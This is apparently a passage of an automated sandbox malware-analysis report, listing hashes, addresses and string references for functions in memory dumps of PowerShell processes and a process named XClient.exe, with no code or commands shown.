M_^N, xrefs: 00007FFD9B898C72
M_^K, xrefs: 00007FFD9B898C6A
M_^?, xrefs: 00007FFD9B898C2A
M_^J, xrefs: 00007FFD9B898C62
M_^8, xrefs: 00007FFD9B898BF2

Memory Dump Source

Source File: 00000004.00000002.1842342633.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
API String ID: 0-962139525
Opcode ID: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
Instruction ID: ad9997269ca045c2f6f29c292932e0e691c5b571fa522245f23bec43a457ca72
Opcode Fuzzy Hash: 78afc6692382add72f29a453e46cef919c850fcb415a89dede20db3bf3140953
Instruction Fuzzy Hash: 2021C2B3B04525CAD30A36ACBC559D87780DF5437938603F3E029CF193F958A48B8A81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8989F2 Relevance: 7.6, Strings: 6, Instructions: 122COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFD9B898A7A
M_^, xrefs: 00007FFD9B898AC9
M_^, xrefs: 00007FFD9B898A62
M_^, xrefs: 00007FFD9B8989F2
M_^, xrefs: 00007FFD9B898A22
M_^, xrefs: 00007FFD9B898A12

Memory Dump Source

Source File: 00000004.00000002.1842342633.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^$M_^$M_^$M_^
API String ID: 0-3353809593
Opcode ID: 16f187f4c996b082c8efcb2de8a2f1b9c11919f0f87e782416a7b4b47cd46b07
Instruction ID: dc0a26725588de4fe67c88065631ffe0ca406169fc23c3247b0ee0521228bd82
Opcode Fuzzy Hash: 16f187f4c996b082c8efcb2de8a2f1b9c11919f0f87e782416a7b4b47cd46b07
Instruction Fuzzy Hash: D631C4A3B0FACB0BE76B46694CA94557FD0FF6679830E03F6C0D58A0A3BC146D474252

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8989D5 Relevance: 6.4, Strings: 5, Instructions: 134COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFD9B898A7A
M_^, xrefs: 00007FFD9B898AC9
M_^, xrefs: 00007FFD9B898A62
M_^, xrefs: 00007FFD9B898A22
M_^, xrefs: 00007FFD9B898A12

Memory Dump Source

Source File: 00000004.00000002.1842342633.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^$M_^$M_^
API String ID: 0-679677686
Opcode ID: f44897e153ebde88b1e655e792d3b2e024907373e51b4aee3a96777a228135ac
Instruction ID: f6e339a6372c527d916a6e2e3db17e2291f95bba87d18ad96e983fe347b73905
Opcode Fuzzy Hash: f44897e153ebde88b1e655e792d3b2e024907373e51b4aee3a96777a228135ac
Instruction Fuzzy Hash: C731A2A3B0FACB0BEB6A466948B94557FD0FF6679874A03F6C0D58A0A3BC152D434252

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7556, Parent PID: 6520COMMON

Executed Functions

Function 00007FFD9B8A644D Relevance: .7, Instructions: 710COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2010025101.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f59cc48488068e53ad81f2c9b1dcafa609282c0df1416e8907d940e4bbf83674
Instruction ID: 7cfc99eff8d2bdad13ba590494821a61bad685bb892f5da35f1263f5fe9eb72d
Opcode Fuzzy Hash: f59cc48488068e53ad81f2c9b1dcafa609282c0df1416e8907d940e4bbf83674
Instruction Fuzzy Hash: 9DD18270A18A4D8FDF99DF5CC455AA9BBE1FF68300F1541AAD409D729ACA34E881CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B976605 Relevance: .4, Instructions: 438COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2011528857.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d6de5b338bbf4c58d7cf25d9356f2ad3f48edca9de714f82d614e8107686538
Instruction ID: 38935f83f0d2b17e1b2881320fd7e198df38eca426827a4c485c9a2ba2e19337
Opcode Fuzzy Hash: 9d6de5b338bbf4c58d7cf25d9356f2ad3f48edca9de714f82d614e8107686538
Instruction Fuzzy Hash: 61D15632A2EB8D5FEBA5EBA848A55B57BD0EF52314F1901FED45CC70E3DA18AD018341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A9FF3 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2010025101.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd1b659ce93ca79616a9ce5bd273a329d0597e099e1c85a614042fd26b98e00d
Instruction ID: 61b56dff90fbf0e465c80a87f1cbb2ba445758f7bb0dc60772e8509449c3d55e
Opcode Fuzzy Hash: fd1b659ce93ca79616a9ce5bd273a329d0597e099e1c85a614042fd26b98e00d
Instruction Fuzzy Hash: 1C418073A0A59A4FE716AB5CA8B60D43F90EF55319F0900B7D0D85B0A3FD2525478792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B78F364 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2007304931.00007FFD9B78D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B78D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b78d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a9a03e4fc4c5073ac13d1adea2f9db2876f67a0d01074b34c9de912cd575fb3
Instruction ID: fd76a36af9f92e71ef2ccf11227d5a69763eec4b6f8ec7cec97b2f173063df00
Opcode Fuzzy Hash: 9a9a03e4fc4c5073ac13d1adea2f9db2876f67a0d01074b34c9de912cd575fb3
Instruction Fuzzy Hash: E841477150EFC44FE7568B2998919523FF0EF57321B160ADFD088CB0B3D625A84AC792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A9789 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2010025101.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3786d4ebb61a6a2c69edb5b01f26af314efe1efd4f2ff0848191dd4a2342c126
Instruction ID: d06e753941e064b560eeb0fcb451d565da1d4f838e155999c0690235fe95c07c
Opcode Fuzzy Hash: 3786d4ebb61a6a2c69edb5b01f26af314efe1efd4f2ff0848191dd4a2342c126
Instruction Fuzzy Hash: 6631A73091CB4C9FDB1CDB5CA84A6A97BE0FB98311F00421FE459D3251DB71A955CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8AA47C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2010025101.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e47cab8b556c026130e3be0eaae9f3ee72e8e98d19ed36def2bf26e86b534e2
Instruction ID: fa17e7b5eceb90b56c1ad93a4c85c5d0037e1a37c4529458d0746e47889ed4cc
Opcode Fuzzy Hash: 0e47cab8b556c026130e3be0eaae9f3ee72e8e98d19ed36def2bf26e86b534e2
Instruction Fuzzy Hash: 1721063090CB4C8FDB59DBAC984A7E97BE0EB9A320F04416BD048C3162DA74A416CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A33B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2010025101.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B97414D Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2011528857.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc1c4708347b8a665b659a0d4f14b9d7569c2b2f2dc53ffd2136275cbf3648e
Instruction ID: 91ecfcf228f1f9eae4edd779415dc45fade2556a4b493a04fd7071c0072d7afa
Opcode Fuzzy Hash: 7fc1c4708347b8a665b659a0d4f14b9d7569c2b2f2dc53ffd2136275cbf3648e
Instruction Fuzzy Hash: BAF0BE32B1E5098FD768EA5CE4919A873E0EF6533071600FAE06DC76B3CA25EC40C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B974400 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2011528857.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ad36397f15344b91536bbf65f8a6382d415f4c9a8fe7bc7f5a315a78714a3e5
Instruction ID: fd6a31d2e9098bff7552ae78a525dce450b71890c24ca24ac3d9a9f48d8f3d52
Opcode Fuzzy Hash: 9ad36397f15344b91536bbf65f8a6382d415f4c9a8fe7bc7f5a315a78714a3e5
Instruction Fuzzy Hash: 47F08231A0E5498FD768EB5CE4A59A877E0FF4532476600FAE05DCB5B3DA25EC40C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B9741D1 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2011528857.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b970000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 473268a2b64a69fa31480ace0e176981786fc005b847518550129db03776ef45
Instruction ID: 3ed3f13d09c5cb3641019798e4eb9bbdc138a09cf3bc0f8a1b78a7e191725b4d
Opcode Fuzzy Hash: 473268a2b64a69fa31480ace0e176981786fc005b847518550129db03776ef45
Instruction Fuzzy Hash: 31E0123171C4089FD678DA4CE0919AD73E5EBA833071241AAD14EC7672CA21ED518B85

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9B8A8BFA Relevance: 6.4, Strings: 5, Instructions: 108COMMON

Download Yara Rule

Strings

L_^F, xrefs: 00007FFD9B8A8C6A
L_^I, xrefs: 00007FFD9B8A8C72
L_^<, xrefs: 00007FFD9B8A8C2A
L_^6, xrefs: 00007FFD9B8A8BFA
L_^J, xrefs: 00007FFD9B8A8C7A

Memory Dump Source

Source File: 00000007.00000002.2010025101.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID: L_^6$L_^<$L_^F$L_^I$L_^J
API String ID: 0-1031638419
Opcode ID: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
Instruction ID: a5b840d0c2db3ff69127c8c8df66edfaabb6974264c93a20f8ecd2169fedd3ae
Opcode Fuzzy Hash: 1a466d4f57ca421675876869b523df085967c141f9b1e0207efbd2f5b90dc140
Instruction Fuzzy Hash: 162127B77084269ED30A77ADBC159EC7380DBD427A34951B3D368CB553EA14A08B8AE0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8A8995 Relevance: 5.1, Strings: 4, Instructions: 127COMMON

Download Yara Rule

Strings

L_^, xrefs: 00007FFD9B8A8A7A
L_^, xrefs: 00007FFD9B8A89C9
L_^, xrefs: 00007FFD9B8A8A2A
L_^, xrefs: 00007FFD9B8A8AC2

Memory Dump Source

Source File: 00000007.00000002.2010025101.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ffd9b8a0000_powershell.jbxd

Similarity

API ID:
String ID: L_^$L_^$L_^$L_^
API String ID: 0-2357752022
Opcode ID: 84e93b0cf18feef41dd14459b328e2de9bc3cf10aba19f0286bd6a3dc914f6b6
Instruction ID: 1f3f348d1e5c3a8a8a8b2db683e578b988b55ea8f073a5e9af1a1e78c8ad8174
Opcode Fuzzy Hash: 84e93b0cf18feef41dd14459b328e2de9bc3cf10aba19f0286bd6a3dc914f6b6
Instruction Fuzzy Hash: AB4181B7A0F6C60FF3664769486A0557F90FF5635878B12F6C1D48B0A3FA19390B8632

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exePID: 7884, Parent PID: 6520COMMON

Executed Functions

Function 00007FFD9B96662F Relevance: .4, Instructions: 416COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2256764031.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8391520fcb6c265bf9f8bd251281791d840320f9cbb0fb5c04583150aa5335e
Instruction ID: 6014ca11406e8d5b31ea23cfc72afa0112210a51332c075a10a37ec7c10544bc
Opcode Fuzzy Hash: f8391520fcb6c265bf9f8bd251281791d840320f9cbb0fb5c04583150aa5335e
Instruction Fuzzy Hash: 09C14632B2EA8D9FEBA5ABA858745B57BD1EF51310B0901BFD44CC70E3D918A905C341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B899750 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2254764285.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0d6ac8f71ba9cce80e87ab8ac17d6d05d1beb741ea06ddeb28f59ff605d827b
Instruction ID: 1305a687a7173bfe93456e32227153539e2167ef992306a4a72162fbc4ecd983
Opcode Fuzzy Hash: c0d6ac8f71ba9cce80e87ab8ac17d6d05d1beb741ea06ddeb28f59ff605d827b
Instruction Fuzzy Hash: 0B41297190DB888FEB199F5C9C1A6A97FE0FB59310F04416FE499C3292DA24B905CBC2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B77EB89 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2252861252.00007FFD9B77D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B77D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b77d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f193a7fb65eccc7b9459821614b9bde51f807e11776b73c9d1206718756e4c15
Instruction ID: c40151f3e13c7760766458f20acc8c38e8b50d9fb027380b095d21fcc312b0e4
Opcode Fuzzy Hash: f193a7fb65eccc7b9459821614b9bde51f807e11776b73c9d1206718756e4c15
Instruction Fuzzy Hash: D841393040EBC84FE7668B3898959623FF4EF57320B1606DFD089CB1B3D625A846C792

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B89A49C Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2254764285.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b3e32ff30ba6af279623954d4a3bcd03ff0b5b25abc9fb76eeacc02e155fef2
Instruction ID: 6e4dfb0a39902280a8f6ffbeb2d684529971f566056958d6797ac8c17bfe7213
Opcode Fuzzy Hash: 4b3e32ff30ba6af279623954d4a3bcd03ff0b5b25abc9fb76eeacc02e155fef2
Instruction Fuzzy Hash: 2C21F83190CB4C8FDB59DBAC9C4A7E97FE0EB96321F04416FD049C3162DA74A816CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8933B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2254764285.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B89A0FB Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2254764285.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73889cf04f7db844a1870b63697f2dc495e8d9b8386c0cb2b3ab8745e3f17e1a
Instruction ID: 434151a67c5bbaec9ebd0300d3b3900b0c7b39d9469c710e2cc9574e9ee0a94d
Opcode Fuzzy Hash: 73889cf04f7db844a1870b63697f2dc495e8d9b8386c0cb2b3ab8745e3f17e1a
Instruction Fuzzy Hash: 05F0FC76A0BE8C4FDB51DF1CD8654E47FA0FF6560170503B7D489C7171DA21994887C1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B96414D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2256764031.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ed311399efb5321d7108bb70e023d18e7b4586f3f384786704bd895ef46f6ee
Instruction ID: 6acd74d62e7451a8a0a74c931d95d9b9721a2073d671ba042affc58b1556c998
Opcode Fuzzy Hash: 3ed311399efb5321d7108bb70e023d18e7b4586f3f384786704bd895ef46f6ee
Instruction Fuzzy Hash: 59F0BE32B0E5098FD768EB9CE4519E873E0EF6532071600BAE06DC72B3CA25EC40C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B964400 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2256764031.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ff26527c1067a8283494624e08a398cb12af5532e67ad39fad15d455725feca
Instruction ID: 93177e50e84b1e993e5b2d4d2dc9052f84976573a621d298af0b609a03761fa3
Opcode Fuzzy Hash: 8ff26527c1067a8283494624e08a398cb12af5532e67ad39fad15d455725feca
Instruction Fuzzy Hash: 61F0BE32A0E5498FD769EB9CE0619A873E0FF0532471600FAE05DCB1A3CA26AC40C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B9641D1 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2256764031.00007FFD9B960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B960000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b960000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction ID: c307260e9cdd7784a7691b08768f083a0fcbbbef75ed33e7c580895a31fc6b9b
Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
Instruction Fuzzy Hash: ADE01A31B1C808DFDA78DA8CE051AE973E1EBA832171241BBD14EC7671CA22ED518B80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD9B898BF2 Relevance: 10.1, Strings: 8, Instructions: 85COMMON

Download Yara Rule

Strings

M_^<, xrefs: 00007FFD9B898C12
M_^K, xrefs: 00007FFD9B898C6A
M_^?, xrefs: 00007FFD9B898C2A
M_^8, xrefs: 00007FFD9B898BF2
M_^Y, xrefs: 00007FFD9B898CBA
M_^J, xrefs: 00007FFD9B898C62
M_^Q, xrefs: 00007FFD9B898C8A
M_^N, xrefs: 00007FFD9B898C72

Memory Dump Source

Source File: 0000000B.00000002.2254764285.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd9b890000_powershell.jbxd

Similarity

API ID:
String ID: M_^8$M_^<$M_^?$M_^J$M_^K$M_^N$M_^Q$M_^Y
API String ID: 0-962139525
Opcode ID: 7e7a3d8de407db449c69fa8481542aeb6a851cff63d93905096c5d76b6b201bf
Instruction ID: ad9997269ca045c2f6f29c292932e0e691c5b571fa522245f23bec43a457ca72
Opcode Fuzzy Hash: 7e7a3d8de407db449c69fa8481542aeb6a851cff63d93905096c5d76b6b201bf
Instruction Fuzzy Hash: 2021C2B3B04525CAD30A36ACBC559D87780DF5437938603F3E029CF193F958A48B8A81

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: XClient.exePID: 5344, Parent PID: 2580COMMON

Executed Functions

Function 00007FFD9B8811D1 Relevance: .5, Instructions: 520COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 032f829d738a6787d6bf7e53be189e6bfdf330e2c41d664b288cb06d9793a617
Instruction ID: d591303f6863cb6d28ed57786a0efae7410f282ceeed8c89cad87f287a2a3d8b
Opcode Fuzzy Hash: 032f829d738a6787d6bf7e53be189e6bfdf330e2c41d664b288cb06d9793a617
Instruction Fuzzy Hash: 5E01D422A0EACE0FEB52A76888701A47BB1EF5E340B0606B3D0A5C71E2DE3429058301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B880C4E Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dbc7aa514c1f80c2934bbd0c439f31e5e4025aa3af36aaf075094c3eee4f665b
Instruction ID: 1751a4471fa6b6a101f1fd2b44f7e6ad32a08cffee222b542bb7993b5b67ca3f
Opcode Fuzzy Hash: dbc7aa514c1f80c2934bbd0c439f31e5e4025aa3af36aaf075094c3eee4f665b
Instruction Fuzzy Hash: 10614821B0FACA0FE356A77848296797FE1DF8A214B0940FBD498C71EBDD5C9C468352

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8816D9 Relevance: .2, Instructions: 213COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0eeedc84fa36395052454ce04fbd781feafd9e1b7e6c1c64c98ea8d3f8144a1d
Instruction ID: 8a705b3c0b9fd8bda9507b0f14c6a6ffe5b33b7fcf6bf463554a3ba455ab6328
Opcode Fuzzy Hash: 0eeedc84fa36395052454ce04fbd781feafd9e1b7e6c1c64c98ea8d3f8144a1d
Instruction Fuzzy Hash: 8C615560F69D0D4FD758B778987DAA976E1FF98200BC14878E05EC32DAEE389901C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B880AE9 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ecea93640871e90d9a7089ef111adb3b5a120fc120f1d307bfad6e124287e728
Instruction ID: b828a582e6bda0bc449436f9b55bb016b1fe67a2e908b0306ad3c6a6cc5346f4
Opcode Fuzzy Hash: ecea93640871e90d9a7089ef111adb3b5a120fc120f1d307bfad6e124287e728
Instruction Fuzzy Hash: 3231A761F19A4A8FEB49BBBC58697BC77D2FF98701F04017AE01DC32D6DE28A9014381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8809A5 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86805f721a2c1c3db9ef94e7521b1797307ecc81ada995cdce572b26c158a677
Instruction ID: f6507bbc8c31cac47df9c01f3d2d0c5e00a58eda0c912f50f9cdfd83f1d0eb20
Opcode Fuzzy Hash: 86805f721a2c1c3db9ef94e7521b1797307ecc81ada995cdce572b26c158a677
Instruction Fuzzy Hash: 69319330A2890E8FDB49FBA8D865AFDB7A1FF98300F814579D059D32D6DD386841C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B88200C Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9abb2bb993d7f3592f00ce38f0168bd9f5e7b34184afb6295531c2c2fd8fb66c
Instruction ID: ed439c78a2b9fabcc6675211265f100761e0222d235ea0c941e52ffeece7f6fc
Opcode Fuzzy Hash: 9abb2bb993d7f3592f00ce38f0168bd9f5e7b34184afb6295531c2c2fd8fb66c
Instruction Fuzzy Hash: 7721C521B1C9484FE788EB2C982A778B6C2EF9C705F0545BEE05DC32DBDD689C418341

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD9B8810F0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.2379730047.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9b880000_XClient.jbxd

